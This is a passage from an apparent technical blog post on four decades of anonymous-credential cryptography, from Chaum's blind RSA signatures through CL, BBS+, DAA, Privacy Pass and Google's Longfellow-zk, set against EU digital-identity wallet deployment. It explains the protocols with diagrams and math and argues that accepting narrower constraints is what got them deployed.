&lt;p&gt;At the &lt;strong&gt;application layer&lt;/strong&gt;, four multi-attribute credential schemes are racing for the European Digital Identity Wallet and mobile driving licence slot, with the EU age-verification app as the first population-scale test case. The contenders are BBS pairing signatures, SD-JWT, the ISO/IEC 18013-5 mdoc baseline, and Google&apos;s Longfellow-zk -- a SNARK that proves &quot;I know an ECDSA signature on a credential that says I am over eighteen&quot; without revealing the signature or any other attribute[@google-2025-zkp-blog].&lt;/p&gt;
&lt;p&gt;Why did the deployment take so long? What finally broke the pattern? And what can the cryptography still not do? To understand any of that, start with the person who first described the problem.&lt;/p&gt;
&lt;h2&gt;2. The Move That Started Everything&lt;/h2&gt;
&lt;p&gt;In 1982, David Chaum was a doctoral candidate at Berkeley looking at the emerging computerised payment system and seeing something that disturbed him: a dossier-building machine. Account-based authentication, the model that banks were quietly digitising, left a stable identifier on every transaction. The merchant knew who you were. The bank knew what you bought. The state, given a court order or a National Security Letter, knew both. Chaum&apos;s contribution to the 1982 &lt;em&gt;CRYPTO&lt;/em&gt; proceedings, and then to &lt;em&gt;Communications of the ACM&lt;/em&gt; three years later, was the first formal way out.&lt;/p&gt;
&lt;p&gt;The 1982 paper introduced a primitive called the &lt;strong&gt;blind signature&lt;/strong&gt; -- a signature scheme in which the signer signs a message they cannot read.&lt;/p&gt;

A signature scheme in which the signer produces a signature on a message it never directly sees, by virtue of the user multiplicatively masking the message with a blinding factor before requesting the signature. After the signer signs the masked value, the user un-blinds the result and is left with a valid signature on the original message -- but the signer cannot link the issued signature to its signing act.
&lt;p&gt;The RSA construction is the easiest one to picture. The signer holds the standard RSA key pair $(N, e, d)$. The user wants a signature on a message $m$ but does not want the signer to learn $m$.&lt;/p&gt;
&lt;p&gt;The user picks a random blinding factor $r$, computes the blinded message $m&apos; = m \cdot r^e \bmod N$, and sends $m&apos;$ to the signer. The signer, who sees only a uniformly random element of $\mathbb{Z}_N^*$, signs as usual: $s&apos; = (m&apos;)^d \bmod N$. The user un-blinds by dividing out the blinding factor: $s = s&apos; \cdot r^{-1} \bmod N$.&lt;/p&gt;
&lt;p&gt;Because $(m \cdot r^e)^d = m^d \cdot r$, what comes out is $s = m^d \bmod N$, a valid RSA signature on the original $m$. The signer held a valid signature in their hand for an instant -- and cannot match it to any later appearance.&lt;/p&gt;

sequenceDiagram
    participant User
    participant Signer
    User-&amp;gt;&amp;gt;User: pick random r, compute m&apos; = m · r^e mod N
    User-&amp;gt;&amp;gt;Signer: send blinded message m&apos;
    Signer-&amp;gt;&amp;gt;Signer: sign s&apos; = (m&apos;)^d mod N
    Signer-&amp;gt;&amp;gt;User: return s&apos;
    User-&amp;gt;&amp;gt;User: unblind s = s&apos; · r^(-1) mod N
    User-&amp;gt;&amp;gt;User: hold valid signature s = m^d mod N on m
&lt;p&gt;That single move is the cryptographic kernel of every anonymous credential system since. Privacy Pass token type 0x0002 in RFC 9578 is Chaum&apos;s blind RSA signature with a 2048-bit modulus and an RSA-PSS padding wrapper; the RFC&apos;s text explicitly credits &quot;Chaum83&quot;[@rfc9474][@rfc9578]. The construction is forty-four years old and is on the wire today.&lt;/p&gt;
&lt;p&gt;In 1985 Chaum extended the framing from payments to a general theory in his &lt;em&gt;Comm. ACM&lt;/em&gt; paper &quot;Security without Identification: Transaction Systems to Make Big Brother Obsolete&quot;[@chaum-1985-doi]. The manifesto&apos;s claim is the one Brussels was making in 2026: a citizen should be able to prove a transaction-relevant fact (over eighteen, holds a licence, has paid) without revealing identity, and without two presentations being linkable to each other. The article uses the term &lt;em&gt;anonymous credential&lt;/em&gt; in the modern sense.&lt;/p&gt;

A cryptographic credential that lets a holder prove a fact about themselves -- for example, &quot;I am over 18&quot; or &quot;I am licensed to drive&quot; -- without revealing identity, and without two presentations of the same credential being linkable to each other across verifiers (or, in stronger formulations, even across the issuer and a colluding verifier).
&lt;p&gt;There are two things to notice about this framing in 1985.&lt;/p&gt;
&lt;p&gt;First, it is forty years early. The post-GDPR, post-Snowden privacy concerns the credential model implicitly addresses had no political constituency in 1985. The deployments Chaum was writing about -- electronic payments, toll roads, public-transit cards -- mostly did not exist yet. The standards bodies that would eventually publish RFCs on this topic had not been formed.&lt;/p&gt;
&lt;p&gt;Second, a bare blind signature is not yet a credential system. A blind signature signs a single opaque message. To prove &quot;I am over 18&quot; without revealing my date of birth, you need a way to sign multiple attributes -- name, date of birth, licence class, expiration -- separately, then prove a &lt;em&gt;predicate&lt;/em&gt; over the bundle (&quot;the date-of-birth field, whatever it is, satisfies birth_year &amp;lt; 2008&quot;) without disclosing the field itself. A naked blind RSA signature on a single value cannot do that. The field would spend the next sixteen years trying to solve the multi-attribute version of the same problem.&lt;/p&gt;
&lt;p&gt;Chaum&apos;s own attempt to commercialise the payment variant was DigiCash, founded by Chaum in 1989 and bankrupt by 1998[@wiki-digicash].The cryptography of DigiCash worked. ING discussed a partnership; Deutsche Bank licensed the technology; both declined to launch consumer-scale deployments[@wiki-digicash]. What did not exist was a merchant network. DigiCash&apos;s tokens were redeemable at only a few hundred merchants worldwide at the company&apos;s peak (about 300, with roughly 5,000 users by 1998)[@wiki-digicash]. It is the canonical &quot;right cryptography, wrong substrate&quot; failure -- the first one in this story, but not the last.&lt;/p&gt;
&lt;p&gt;Chaum had named the problem. The field would now spend two decades trying to extend the primitive to a full multi-attribute credential system, and would quietly fail to ship anything outside research code.&lt;/p&gt;
&lt;h2&gt;3. The Multi-Attribute Decades&lt;/h2&gt;
&lt;p&gt;Between 1993 and 2014, the academic literature produced two complete family trees of multi-attribute anonymous credential schemes, each of them correct cryptography, neither of them deploying at scale. The drumbeat of these two decades is a single sentence: the math worked, and nobody used it.&lt;/p&gt;
&lt;h3&gt;Brands and the Wallet-with-Observer&lt;/h3&gt;
&lt;p&gt;Stefan Brands, working in Amsterdam and later at Microsoft Research, gave the &lt;em&gt;CRYPTO &apos;93&lt;/em&gt; paper that defined a deployment architecture twenty-five years too early[@brands-1993-doi]. His scheme combined a restrictive blind signature with what he called a &quot;wallet with observer&quot; -- a tamper-resistant chip that holds a per-user secret, plus a host computer that runs the privacy-preserving protocol around it. The chip&apos;s job is to prevent the user from double-spending or copying credentials; the host&apos;s job is to compute the unlinkable presentation. Double-spending mathematically reveals the user&apos;s identity (a feature, not a bug).&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Brands&apos; 1993 architecture -- a tamper-resistant chip that holds a per-user secret, plus a host that computes the privacy-respecting transformation -- is structurally identical to the EUDI Wallet&apos;s secure-element-plus-on-device-prover architecture in 2026. The chip is the observer, the host is the wallet. The architecture was right; the hardware -- a programmable secure element with attestation, present in every smartphone -- was decades late.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Brands founded Credentica in the early 2000s to commercialise the construction; Microsoft acquired Credentica on 6 March 2008 and renamed the technology &lt;em&gt;U-Prove&lt;/em&gt;[@wiki-brands][@microsoft-uprove]. Microsoft folded U-Prove into the CardSpace identity selector, then announced on 15 February 2011 that CardSpace 2.0 would not ship[@wiki-cardspace]. The Microsoft Research project page still documents U-Prove as of 2026, but no Microsoft product ships it[@microsoft-uprove]. It is the second canonical &quot;right cryptography, no relying-party demand&quot; deployment death.&lt;/p&gt;
&lt;p&gt;The lowercase &quot;a&quot; in abhi shelat&apos;s name -- the Northeastern professor who, with Matteo Frigo, designs Longfellow-zk in Section 5 -- is intentional and consistent across his publications.&lt;/p&gt;
&lt;h3&gt;Camenisch-Lysyanskaya and the CL Signature Family&lt;/h3&gt;
&lt;p&gt;In 2001, Jan Camenisch and Anna Lysyanskaya at IBM Zurich gave the first practical and provably-secure multi-show anonymous credential system at &lt;em&gt;EUROCRYPT&lt;/em&gt;[@cl2001-doi]. CL signatures use a Strong-RSA assumption to sign a committed vector of messages; the holder then proves possession of the signature in zero knowledge using a Sigma protocol. The construction anchored the field&apos;s pedagogy for the next decade. Two properties matter here.&lt;/p&gt;

The property that a credential holder can reveal an arbitrary subset of the attributes on the credential while keeping the rest hidden, with a cryptographic proof that the revealed subset is consistent with the issuer&apos;s signature on the full credential.

The property that two or more presentations of the same credential -- by the same holder, to the same verifier or to colluding verifiers -- cannot be cryptographically linked to each other. The holder can present the credential many times, and each presentation looks fresh.
&lt;p&gt;CL signatures gave both properties. IBM built a production-quality library on top called &lt;em&gt;Idemix&lt;/em&gt; and open-sourced it in the early 2010s[@idemix-ibm].The exact open-source release date is folk-knowledge-ambiguous. The IBM Zurich identity-mixer project page (still live as of 2026 and now serving as Hyperledger Fabric Idemix documentation) confirms the project but does not pin the release year. Multiple secondary sources say &quot;around 2010&quot;; no canonical IBM press release survived. Idemix is the ancestor of every &quot;self-sovereign identity&quot; deployment today; the Hyperledger AnonCreds specification is its direct production descendant[@anoncreds-spec].&lt;/p&gt;
&lt;p&gt;Why didn&apos;t Idemix deploy at internet scale? Two reasons that the field would meet again and again. Per-presentation proofs were kilobyte-scale and the Sigma-protocol verification was substantially slower than ECDSA on 2010 hardware -- the &lt;em&gt;PoPETs 2018&lt;/em&gt; Privacy Pass paper later wrote that prior CL-based approaches &quot;require an order of magnitude more computational resources than our protocol&quot;[@popets-2018]. And, more importantly than either: no browser parsed a CL credential, no website asked for one, no operating system surfaced a credential picker UI. The cryptography was twenty years ahead of the relying-party layer it needed to ride.&lt;/p&gt;
&lt;h3&gt;DAA: A Credential System on Every TPM (Almost)&lt;/h3&gt;
&lt;p&gt;In 2004, Ernie Brickell, Jan Camenisch, and Liqun Chen adapted a CL-family scheme into something a Trusted Platform Module could compute, calling it Direct Anonymous Attestation[@daa-2004-doi]. DAA targeted TPM 1.2 chips (shipped from 2005)[@daa-2004-doi]. When the TCG redrew the TPM 2.0 Library Specification in October 2014, they re-defined the scheme in elliptic-curve form -- ECDAA on pairing-friendly curves -- and folded it into the spec as an optional algorithm[@tpm-2-spec].&lt;/p&gt;

A TPM-deployable anonymous-credential primitive (Brickell, Camenisch, and Chen, 2004) that lets a TPM prove it is a genuine TPM certified by its manufacturer without revealing which specific TPM. ECDAA, the elliptic-curve form, is standardised in the TPM 2.0 Library Specification (TCG, October 2014) as an *optional* algorithm.
&lt;p&gt;The hardware-root anonymous credential genuinely shipped. By 2026, every PC sold in the last several years carries a TPM 2.0[@tpm-2-spec] capable of running ECDAA[@daa-2004-doi] -- Microsoft has required a TPM 2.0 on every Windows 11 device since October 2021[@win11-tpm-req], putting billions of chips in the field (see the corpus &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM in Windows post&lt;/a&gt; for the deployment-scale figure). In practice almost none of them do.&lt;/p&gt;
&lt;p&gt;The TCG made ECDAA optional, and the major consumer-TPM vendors mostly did not enable it. Intel&apos;s firmware TPM, AMD&apos;s fTPM, the Infineon, STMicroelectronics, and Nuvoton discrete TPMs in the retail channel -- the relying-party-side software simply does not issue DAA challenges, so the TPM-side implementation is dead code at best and absent at worst. &lt;a href=&quot;https://paragmali.com/blog/webauthn-and-passkeys-on-windows-from-ctap-to-the-credential/&quot; rel=&quot;noopener&quot;&gt;WebAuthn&lt;/a&gt;, which lets a browser identify a device with consent and trades anonymity for usability, became the deployed device-attestation protocol because it has a relying-party-side consumption story. The pre-existing post in this corpus on DAA gives the long-form treatment.&lt;/p&gt;
&lt;h3&gt;BBS: Eighty-Byte Signatures, Nobody to Sign Them&lt;/h3&gt;
&lt;p&gt;The other family tree starts in 2004 with Boneh, Boyen, and Shacham&apos;s &lt;em&gt;Short Group Signatures&lt;/em&gt;, the construction now universally called &lt;em&gt;BBS&lt;/em&gt;[@bbs-2004-chapter]. BBS uses bilinear pairings on a pairing-friendly elliptic curve -- BLS12-381 in the modern IETF draft -- to produce signatures that are roughly eighty bytes, two orders of magnitude smaller than the CL-RSA equivalent. Au, Susilo, and Mu extended BBS to a multi-message form in 2006 (originally titled &lt;em&gt;Constant-Size Dynamic k-TAA&lt;/em&gt;), which is the scheme the W3C Verifiable Credentials community now calls BBS+[@bbs-plus-2006-chapter].&lt;/p&gt;

A pairing-based multi-message signature scheme (Au, Susilo, and Mu, 2006) over a pairing-friendly curve, BLS12-381 in the current IETF draft. BBS+ supports zero-knowledge proofs of possession with selective disclosure, achieves multi-show unlinkability, and produces signatures of roughly 80 bytes and proofs of roughly 256 bytes -- the smallest known for any scheme with these properties.
&lt;p&gt;BBS is, by 2026, the cleanest cryptography in the credentials portfolio. The IETF CFRG &lt;code&gt;draft-irtf-cfrg-bbs-signatures-10&lt;/code&gt;, dated 8 January 2026 with authors Looker, Kalos, Whitehead, and Lodder, gives an interoperable specification[@bbs-draft-10]. The MATTR and Trinsic stacks ship BBS implementations[@mattr-bbs][@trinsic-id]. The W3C Verifiable Credentials Data Model 2.0 (Recommendation, 15 May 2025) accommodates BBS as a securing mechanism[@w3c-vcdm-2]. None of that translates to mainstream issuer adoption, because no driver&apos;s-licence-issuing DMV, no national-ID authority, no banking customer-identification scheme has switched to signing credentials with a pairing on BLS12-381. The infrastructure asks for ECDSA-P-256, what every existing PKI emits.&lt;/p&gt;
&lt;p&gt;Every theoretically pure proposal in this twenty-year era assumed the verifier wanted multi-attribute selective disclosure. Every verifier in 2010 just wanted to verify a cookie. The cryptography sat in libraries. The deployment substrate to call it did not exist.&lt;/p&gt;
&lt;h2&gt;4. Eight Generations, One Pattern&lt;/h2&gt;
&lt;p&gt;Pull back from the individual papers and the four-decade arc has a clean shape. Each generation produces correct cryptography. Each generation fails to ship at consumer scale, for one of two reasons: the construction needs hardware that does not exist yet, or the construction needs a relying-party-side protocol that does not exist yet. The single generation that broke the pattern in 2017 did so by giving up the multi-attribute ambition entirely.&lt;/p&gt;

gantt
    dateFormat YYYY-MM
    axisFormat %Y
    section Foundational primitives
    Blind signatures (Chaum)          :done, ch1, 1982-01, 1985-12
    Security without ID (Chaum CACM)  :done, ch2, 1985-10, 1990-01
    section Multi-attribute (academic)
    Brands wallets + observers        :done, br, 1993-08, 2001-01
    CL signatures (Camenisch-Lysyanskaya) :done, cl, 2001-05, 2010-01
    BBS short group signatures        :done, bbs, 2004-08, 2014-01
    BBS+ (Au-Susilo-Mu)               :done, bbsp, 2006-08, 2016-01
    Microsoft acquires Credentica     :done, ms, 2008-03, 2011-01
    section Hardware root
    DAA paper (Brickell-Camenisch-Chen) :done, daa, 2004-10, 2014-10
    TPM 2.0 spec with optional ECDAA   :done, tpm, 2014-10, 2020-01
    section Deployment era
    Cloudflare ships Privacy Pass extension :done, cf, 2017-11, 2018-06
    PoPETs Privacy Pass paper           :done, popets, 2018-06, 2020-01
    Apple PAT in iOS 16                 :done, apat, 2022-06, 2023-01
    RFC 9474 RSA Blind Signatures       :done, r74, 2023-10, 2024-01
    RFC 9497 OPRF                       :done, r97, 2023-12, 2024-06
    eIDAS 2 enters into force           :done, eidas, 2024-05, 2024-12
    Privacy Pass RFCs 9576-9578         :done, ppppp, 2024-06, 2025-01
    section Multi-attribute resurgence
    Frigo-shelat Longfellow paper       :done, lf1, 2024-12, 2025-06
    W3C VCDM 2.0 Recommendation         :done, vcdm, 2025-05, 2025-11
    Google open-sources Longfellow-zk   :done, lf2, 2025-07, 2026-04
    SD-JWT becomes RFC 9901             :done, sd, 2025-11, 2026-04
    Green primer Part 1                 :done, g1, 2026-03, 2026-04
    EU age app technically ready        :done, eu, 2026-04, 2026-12
    Green primer Part 2                 :done, g2, 2026-04, 2026-05
    EUDI Wallet Member-State deadline   :crit, mdl, 2026-12, 2027-12
&lt;p&gt;&lt;strong&gt;Generation 1 (1982-1985): blind signatures.&lt;/strong&gt; Chaum&apos;s single primitive. Signs one opaque message. No multi-attribute support. DigiCash bankruptcy 1998. The substrate was a merchant network that did not exist.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 2 (1993): Brands&apos; wallet-with-observer.&lt;/strong&gt; The correct architecture for a tamper-resistant chip plus host computer. Hardware that could play the observer role did not exist; consumer smartphones with secure elements would not arrive until the 2010s. U-Prove acquired by Microsoft 2008; never shipped[@wiki-brands][@microsoft-uprove].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 3 (2001-2010): CL signatures + Idemix.&lt;/strong&gt; First multi-show unlinkable, selectively-disclosing credentials with provable security. Multi-kilobyte presentation proofs. No browser parsed them. The Davidson et al. &lt;em&gt;PoPETs 2018&lt;/em&gt; paper later wrote that prior CL-based approaches &quot;require an order of magnitude more computational resources than our protocol&quot;[@popets-2018].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 4 (2004-2006): BBS, BBS+.&lt;/strong&gt; Eighty-byte pairing signatures and 256-byte proofs. Still undeployed at issuer scale in 2026 because no national identity authority has switched its PKI to BLS12-381[@bbs-draft-10].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 5 (2004-2014): DAA / TPM 2.0 ECDAA.&lt;/strong&gt; Shipped into the spec; mostly not into consumer hardware; never into a browser-side challenge.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The TPM 2.0 Library Specification (TCG, October 2014) defines ECDAA but makes it an optional algorithm. Consumer-TPM vendors mostly do not enable it, and no major operating system or browser issues DAA challenges. The often-repeated claim &quot;DAA shipped on every TPM 2.0 chip&quot; is wrong on two counts -- the algorithm is optional in the spec, and the relying-party-side consumption path was never built[@tpm-2-spec].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Generation 6 (2017-2018): Privacy Pass.&lt;/strong&gt; Alex Davidson, Ian Goldberg, Nick Sullivan, George Tankersley, and Filippo Valsorda looked at the Cloudflare CAPTCHA crisis -- Tor users especially were being challenged on every Cloudflare-fronted site -- and asked the question the field had refused to ask for fifteen years: &lt;em&gt;what if we just need one bit?&lt;/em&gt;[@popets-2018]&lt;/p&gt;
&lt;p&gt;Drop selective disclosure. Drop multi-attribute. The credential becomes &quot;this client solved a CAPTCHA.&quot; For one bit, you do not need CL or BBS+. You need a verifiable oblivious pseudorandom function, or a blind RSA signature, both of which fit in two group operations. Cloudflare shipped the original browser extension on 9 November 2017[@cloudflare-2017-pp].The 2017 launch date is sometimes given as 24 October, but the surviving canonical post slug is &lt;code&gt;cloudflare-supports-privacy-pass&lt;/code&gt; and is dated 2017-11-09. The earlier introducing-privacy-pass URL returns 404 today; Cloudflare&apos;s current documentation page links the November date[@cloudflare-pp-docs].&lt;/p&gt;

An Oblivious Pseudorandom Function: a two-party protocol that computes $F(k, x)$ where one party knows the key $k$ but learns nothing about the input $x$, and the other party knows $x$ but learns nothing about $k$. The Verifiable variant additionally proves that the same $k$ was used as in a published public key. RFC 9497 standardises OPRF, VOPRF, and POPRF (a partially-oblivious variant) over prime-order groups[@rfc9497].

An IETF Standards-Track protocol family (RFCs 9576, 9577, and 9578, all June 2024) for issuing and redeeming unlinkable one-bit anonymous tokens at internet scale. Deployed in production by Cloudflare, by Apple as Private Access Tokens, by Google Chrome as Private State Tokens, and -- per Matthew Green&apos;s April 2026 primer -- by Microsoft Edge[@rfc9576][@rfc9577][@rfc9578][@green-2026-part2].
&lt;p&gt;The IETF threat model that the RFCs eventually codified splits the world into four parties. The client wants a token. The attester decides whether the client deserves one (CAPTCHA solved, device attested, account in good standing). The issuer cryptographically issues the token without learning what the attester learned. The origin -- the website the client wants to access -- redeems the token without learning who the client is. The separation between attester and issuer is what gives Privacy Pass its formal anonymity property; an attacker would need both parties to collude to link a token to the human who earned it.&lt;/p&gt;

flowchart LR
    Client[Client browser or app]
    Attester[Attester: checks device or CAPTCHA]
    Issuer[Issuer: blind-signs token]
    Origin[Origin: target website]
    Client --&amp;gt;|1. request attestation| Attester
    Attester --&amp;gt;|2. forward blinded token| Issuer
    Issuer --&amp;gt;|3. return blinded signature| Client
    Client --&amp;gt;|4. redeem unblinded token| Origin
&lt;p&gt;&lt;strong&gt;Generation 7 (2023-2024): IETF standardisation.&lt;/strong&gt; Privacy Pass moved from a Cloudflare experiment to a Standards-Track protocol in a tight eight-month window. RFC 9474 (RSA Blind Signatures, CFRG, Informational) appeared in October 2023[@rfc9474]. RFC 9497 (OPRF/VOPRF/POPRF, CFRG, Informational) appeared in December 2023[@rfc9497]. The three Privacy Pass RFCs followed in June 2024 -- RFC 9576 (Architecture, Informational)[@rfc9576], RFC 9577 (HTTP Authentication Scheme, Standards Track)[@rfc9577], and RFC 9578 (Issuance Protocols, Standards Track), which defines token type 0x0001 (VOPRF) and token type 0x0002 (Blind RSA) in a public registry[@rfc9578].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 8 (2022-2026): the multi-attribute resurgence.&lt;/strong&gt; Once Privacy Pass made the issuer-attester-origin abstraction a standardised wire format, the field went back to the multi-attribute problem with a clearer head. By 2026 there is a three-way race for the EUDI Wallet and mobile-driving-licence slot:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;SD-JWT VC&lt;/strong&gt;, the JSON Web Signature plus salted-hash selective-disclosure scheme by Daniel Fett, Kristina Yasuda, and Brian Campbell. Promoted from a long-running IETF draft to &lt;strong&gt;RFC 9901 (Standards Track) in November 2025&lt;/strong&gt;, and the EUDI Wallet Architecture and Reference Framework&apos;s mandatory baseline[@rfc9901].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ISO/IEC 18013-5 mdoc baseline&lt;/strong&gt;, the CBOR-plus-ECDSA mobile driving licence format, published 2021, deployed by US state DMVs in Arizona, Colorado, Georgia, Maryland and others, and adopted as the EUDI Wallet PID co-baseline[@iso-18013-5].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Longfellow-zk&lt;/strong&gt;, the MPC-in-the-head SNARK by Matteo Frigo and abhi shelat that wraps an existing ECDSA-signed mdoc, posted as IACR ePrint 2024/2010 in December 2024 and open-sourced by Google under Apache-2.0 on &lt;strong&gt;3 July 2025&lt;/strong&gt;[@google-2025-zkp-blog][@longfellow-repo][@libzk-draft].The Google announcement is dated 3 July 2025, not April 2026. The April 2026 date occasionally seen in press coverage conflates Google&apos;s open-sourcing with Matthew Green&apos;s April 2026 primer that brought broader engineering attention to it.&lt;/li&gt;
&lt;/ul&gt;

The cryptography community had spent fifteen years on selective-disclosure schemes, predicate proofs, and pairing-based protocols meant to fold every credential anyone might want into a single cryptographically clean structure. Cloudflare&apos;s deployment team in 2017 said, in effect, *we do not need any of that, we need one bit, and we need it now*. The bit is &quot;did this client solve a CAPTCHA in the last day or so.&quot; A VOPRF-issued token is the bit; nothing else has to ship. That constraint relaxation is what crossed the deployment chasm -- and the multi-attribute resurgence of 2022-2026 is happening on top of the wire-format substrate that Privacy Pass established.&lt;p&gt;The cultural reset matters as much as the cryptography. Before Privacy Pass, the field&apos;s working assumption was that an anonymous credential needed to be a general-purpose identity certificate. After Privacy Pass, an anonymous credential can be as narrow as a single bit -- and the multi-attribute schemes return as one more option in a portfolio rather than the only thing that can ship.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;In eighteen months -- between June 2024 and April 2026 -- anonymous credentials went from &quot;Cloudflare&apos;s anti-abuse experiment&quot; to &quot;shipped in every browser, standardised at IETF, mandated by the EU.&quot; How did the field finally crack a problem that had been open for four decades? The answer is not &quot;better cryptography.&quot; It is one insight, repeated twice in different decades.&lt;/p&gt;
&lt;h2&gt;5. The Two Insights That Finally Shipped It&lt;/h2&gt;
&lt;p&gt;Two breakthroughs, twenty years apart, neither of which was a new cryptographic primitive.&lt;/p&gt;
&lt;h3&gt;Breakthrough 1: One Bit (2017)&lt;/h3&gt;
&lt;p&gt;In 2017, the academic problem statement for an anonymous credential read roughly &lt;em&gt;prove a predicate over a multi-attribute signed bundle without revealing any unrelated attribute&lt;/em&gt;. That problem, in full generality, demands selective disclosure, predicate proofs, and multi-show unlinkability -- the entire CL and BBS+ machinery. For fifteen years the field had been trying to make that machinery fast enough and small enough to ship inside a browser.&lt;/p&gt;
&lt;p&gt;Cloudflare&apos;s anti-abuse team was looking at a different problem. The dominant real-world need for anonymous authentication on the web was: prove that a client is human, prove nothing else. Tor users solving a CAPTCHA on every Cloudflare-fronted page wanted that bit redeemable across many subsequent page loads. Privacy-preserving advertising fraud signals wanted that bit. The protocol did not need to express &quot;I am over 18 and a licensed driver in California&quot; -- it needed to express &quot;this client is not a bot.&quot; One bit.&lt;/p&gt;
&lt;p&gt;For one bit, all of the multi-attribute machinery falls away. A blind RSA signature is exactly one bit of authentication (the signature either verifies or it does not), and the holder gets unlinkability because the issuer cannot match the unblinded token to its signing act. A VOPRF token is the same shape, with the issuer learning nothing about the token&apos;s content and only the holder of the input knowing what was authenticated.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Two decades of failed anonymous-credential deployment ended not because the cryptography got better, but because the field accepted constraints (one bit per token; multi-kilobyte SNARK proofs) that the elegant multi-attribute schemes had refused. The constraint relaxation was the breakthrough, not the math.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The &lt;em&gt;PoPETs 2018&lt;/em&gt; paper by Davidson, Goldberg, Sullivan, Tankersley, and Valsorda made this explicit[@popets-2018]. Privacy Pass advertises &quot;1-RTT&quot; issuance, sub-millisecond per token, 64-96 bytes on the wire. The construction is so light that Cloudflare&apos;s edge could run an issuer in the same datacentre as a CAPTCHA solver and bill the whole flow as latency-equivalent to a single HTTP redirect[@popets-2018][@cloudflare-2017-pp].&lt;/p&gt;
&lt;h3&gt;Breakthrough 2: Keep the Issuer&apos;s ECDSA Key (2024)&lt;/h3&gt;
&lt;p&gt;The same move happened again, in the same shape, in December 2024.&lt;/p&gt;
&lt;p&gt;For multi-attribute credentials, the obvious cryptographic answer was BBS. Eighty-byte signatures, 256-byte proofs, multi-show unlinkability, predicate proofs in progress. Cryptographically clean. The barrier was issuer adoption: every credential issuer in the world signs with ECDSA-P-256 today. Persuading the European Member State driving-licence authorities to switch their PKI to pairings on BLS12-381 is a twenty-seven-jurisdiction infrastructure project, not a software upgrade.&lt;/p&gt;
&lt;p&gt;Matteo Frigo and abhi shelat (then both at Northeastern, with Frigo later at Google) accepted a different constraint. Their idea: build a SNARK that proves &quot;I know an ECDSA-P-256 signature, by the DMV&apos;s public key, on an mdoc whose &lt;code&gt;age_over_18&lt;/code&gt; element is &lt;code&gt;true&lt;/code&gt;,&quot; and let the holder hand over only the SNARK proof. The issuer never changes anything. The DMV keeps signing ECDSA mdocs the way it already does. The holder&apos;s device runs the SNARK at presentation time[@google-2025-zkp-blog][@libzk-draft].&lt;/p&gt;

A proof-system construction (Ishai, Kushilevitz, Ostrovsky, and Sahai, 2007) in which the prover simulates a multi-party computation &quot;in their head&quot; and commits to each party&apos;s view; the verifier opens a random subset of views to check consistency. The Ligero variant plus a sumcheck protocol is the proof system that underlies Longfellow-zk and lets it verify an ECDSA signature inside a SNARK at acceptable cost on a 2024 mobile CPU.
&lt;p&gt;The proof system Frigo and shelat picked -- MPC-in-the-head plus sumcheck -- had been sitting in the literature since 2007 (Ishai-Kushilevitz-Ostrovsky-Sahai, STOC[@ikos-2007-dblp][@ikos-doi]) and 2017 (Ligero, Ames-Hazay-Ishai-Venkitasubramaniam, CCS[@ligero-2017-dblp][@ligero-doi]), largely dormant because mobile CPUs were too slow to make it practical for a real signature verification circuit. By 2024, an iPhone 14 or a 2024-era Pixel could produce a Longfellow proof on an mdoc in roughly 1.2 seconds, with a proof size of roughly 30 KB on the wire[@google-2025-zkp-blog][@longfellow-docs]. Not pretty. Two orders of magnitude bigger than a BBS proof. But the issuer&apos;s PKI does not move an inch.&lt;/p&gt;

The protocol step is worth unpacking. The prover wants to convince a verifier that they know a witness $w$ such that a circuit $C(x, w) = 1$ for public input $x$. The prover imagines an $n$-party MPC that evaluates $C$ on a random secret-sharing of $w$ across the $n$ parties; runs the entire MPC in their head; and *commits* to each party&apos;s complete view (its share, its randomness, every message it received). The verifier picks a random subset of $t &amp;lt; n$ views to open, and the prover reveals those views. The verifier then re-runs each opened party&apos;s MPC locally, checks that each opened view is internally consistent with the protocol it claims to run, and checks that every pair of opened views agrees on the messages they exchanged. If any opened view cheats -- if the prover faked a share or a message -- two opened parties will disagree, and the verifier rejects.&lt;p&gt;The per-check soundness error is $\binom{n-c}{t}/\binom{n}{t}$, where $c$ is the number of views the prover would need to cheat in to forge. For the standard $(n,t)=(3,2)$ IKOS parameters this is $1/3$ per check, so $O(\lambda)$ independent column-openings drive the total error below $2^{-\lambda}$.&lt;/p&gt;
&lt;p&gt;Ligero swaps the view-commitment for a Reed-Solomon-encoded matrix of secret values and adds a sumcheck-style verification step, letting the verifier check large arithmetic constraints with logarithmic interaction. The composite proof size scales as $O(\sqrt{|C|}\cdot\lambda)$ in the verified circuit. For ECDSA-P-256 verification (a few thousand gates), that lands at the ~30 KB Longfellow reports.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;

flowchart LR
    DMV[mDL issuer: state DMV]
    Mdoc[ECDSA-P-256 signed mdoc]
    Wallet[Holder wallet on phone]
    Proof[Longfellow SNARK proof: age_over_18 is true]
    Verifier[Age-gate verifier]
    DMV --&amp;gt;|sign with existing ECDSA key| Mdoc
    Mdoc --&amp;gt;|stored in| Wallet
    Wallet --&amp;gt;|MPC-in-the-head + sumcheck SNARK| Proof
    Proof --&amp;gt;|verify against issuer pubkey| Verifier
    Verifier --&amp;gt;|accept or reject| Wallet
&lt;p&gt;Both breakthroughs accept constraints the cryptography community had refused to accept -- and the elegant alternatives (CL signatures, BBS+) sat unshipped for two decades each. The deployment picture in May 2026 is therefore no longer hypothetical.&lt;/p&gt;
&lt;h2&gt;6. What&apos;s Actually on the Wire in May 2026&lt;/h2&gt;
